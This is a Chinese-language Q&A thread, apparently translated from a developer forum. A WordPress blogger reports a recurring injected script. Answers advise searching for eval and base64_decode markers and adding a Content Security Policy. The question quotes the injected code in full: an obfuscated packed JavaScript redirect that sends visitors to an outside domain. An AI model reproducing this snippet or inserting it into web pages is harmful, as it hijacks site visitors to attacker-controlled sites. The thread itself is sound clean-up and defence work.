Wordpress上的Javascript注入预防

Question

我在wordpress上的博客注入了以下恶意脚本：

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{}))

它导航到：

• http://oxxtm.com/重定向到：
  • http://www.html5website.com/

我已经禁用了一些插件，但似乎问题出在其他地方，因为我使用以下插件并且它们似乎有良好的声誉：

• Akismet在
• 登录验证码
• 免费和简单的联系表单插件 - PirateForms（我的Zerif Lite主题推荐）
• SMTP邮件程序
• WooCommerce

如果我找不到rootcause，你会建议处理“重定向”事件以保持网站运行吗？ 如果是这样，如果有重定向指向http://oxxtm.com/并使用javascript中止它我怎么能处理？

我尝试使用onunload和onbeforeunload事件，但它似乎是注入的eval ，在事件操作甚至注册之前运行。

我可以看到它在wo​​rdpress中被注入不同的PHP页面（有时只有一个），我不知道是否有一个常见的PHP文件，我可以在其中包含一个脚本来阻止这个恶意脚本的操作。

我已经多次删除了恶意脚本，但它会一次又一次地被注入。 我在搜索原因时需要对症状进行处理，否则网站将无法使用。 但是，我不明白脚本是如何注入的。

Answer 1

在所有文件中搜索以下内容： eval(function()

它将显示包含此代码的每个文件。

否则，尝试搜索： base64_decode

这是一个允许解码base64编码文本的函数，恶意PHP文件经常使用它来注入一些搜索eval(无法检测到的代码eval(

如果问题仍然存在，请在此处回答，我会尽力帮助您。

Answer 2

另外，作为保护客户端免受XSS影响的附加功能，我建议您在清洗注射后端后使用CSP。 您可以阅读更多相关信息： https ： //developer.mozilla.org/en/docs/Web/Security/CSP这不是一个银弹，但很高兴能够保护用户。